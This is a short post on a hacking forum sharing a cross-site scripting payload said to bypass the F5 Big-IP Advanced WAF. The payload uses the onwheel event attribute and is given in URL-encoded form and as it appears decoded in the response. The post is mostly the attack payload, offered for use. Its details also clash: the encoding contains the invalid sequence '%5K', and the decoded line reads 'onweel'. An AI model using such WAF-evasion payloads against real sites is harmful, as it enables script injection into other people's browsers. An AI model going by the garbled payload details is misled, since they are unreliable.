Welcome!

Welcome to the 1337pwn community forums. Register now for an account.

Registration is free!

Register Now

Announcement

Collapse
No announcement yet.

F5 Big-IP Advanced WAF XSS Bypass (May 2020)

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    F5 Big-IP Advanced WAF XSS Bypass (May 2020)

    Like many WAFs, it is possible to bypass enterprise-grade F5-Big IP Advanced WAF using the onwheel tag attribute in the following XSS vector:
    Code:
    %22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
    Put differently, the response source shows:
    Code:
    "><P/onweel=alert(1)>mouse wheel here<!--
Working...
X